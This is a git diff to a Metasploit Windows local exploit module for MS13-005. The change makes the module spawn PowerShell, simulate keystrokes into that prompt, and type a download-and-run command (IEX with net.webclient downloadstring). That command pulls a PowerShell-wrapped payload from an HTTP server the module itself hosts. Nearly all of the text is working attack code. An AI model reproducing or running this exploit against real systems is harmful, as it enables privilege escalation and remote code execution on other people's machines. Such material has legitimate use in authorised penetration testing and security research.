diff --git a/modules/exploits/windows/local/ms13_005.rb b/modules/exploits/windows/local/ms13_005.rb index 5d649ac053..74dbd225f7 100644 --- a/modules/exploits/windows/local/ms13_005.rb +++ b/modules/exploits/windows/local/ms13_005.rb @@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer def initialize(info={}) super( update_info( info, @@ -39,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], - 'Targets' => + 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] @@ -60,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Local OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]) ], self.class ) - + register_advanced_options( [ OptBool.new('EEGG', [false, '',]) @@ -70,38 +71,36 @@ class Metasploit3 < Msf::Exploit::Local def win_shift(number) vk = 0x30 + number - bscan = 0x81 + number + bscan = 0x81 + number client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) - sleep(0.01) client.railgun.user32.keybd_event(vk, bscan, 0, 0) - sleep(0.01) - client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) end - + def count_cmd_procs count = 0 client.sys.process.each_process do |proc| - if proc['name'] == 'cmd.exe' + if proc['name'] == 'powershell.exe' count += 1 end end - + vprint_status("Cmd prompt count: #{count}") return count end - + def cleanup if datastore['SPAWN_PROMPT'] vprint_status("Rehiding window...") - client.railgun.user32.ShowWindow(@hwin, 0) + #client.railgun.user32.ShowWindow(@hwin, 0) end end - def exploit + def primer + start_service # syinfo is only on meterpreter sessions e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg==" print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? @@ -111,14 +110,14 @@ class Metasploit3 < Msf::Exploit::Local if @hwin == nil @hwin = client.railgun.user32.GetForegroundWindow()['return'] end - #client.railgun.user32.ShowWindow(@hwin, 0) - #client.railgun.user32.ShowWindow(@hwin, 5) + client.railgun.user32.ShowWindow(@hwin, 0) + client.railgun.user32.ShowWindow(@hwin, 5) # Spawn low integrity cmd.exe print_status("Spawning Low Integrity Cmd Prompt") windir = client.fs.file.expand_path("%windir%") - li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid - + li_cmd_pid = client.sys.process.execute("powershell.exe", nil, {'Hidden' => false }).pid + count = count_cmd_procs spawned = false # Bruteforce taskbar position Win+Shift+? @@ -139,17 +138,26 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned end - + print_status("Broadcasting payload command to prompt... I hope the user is asleep!") - payload = Rex::Text.decode_base64(e) if datastore['EEGG'] - payload.each_char do |c| - print c + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + url = get_uri() + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" + command = download_and_run + command = Rex::Text.decode_base64(e) if datastore['EEGG'] + command.each_char do |c| + print c if command.length < 200 client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0) - sleep(0.01) end - print_line + print_line print_status("Executing command...") client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0) end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end end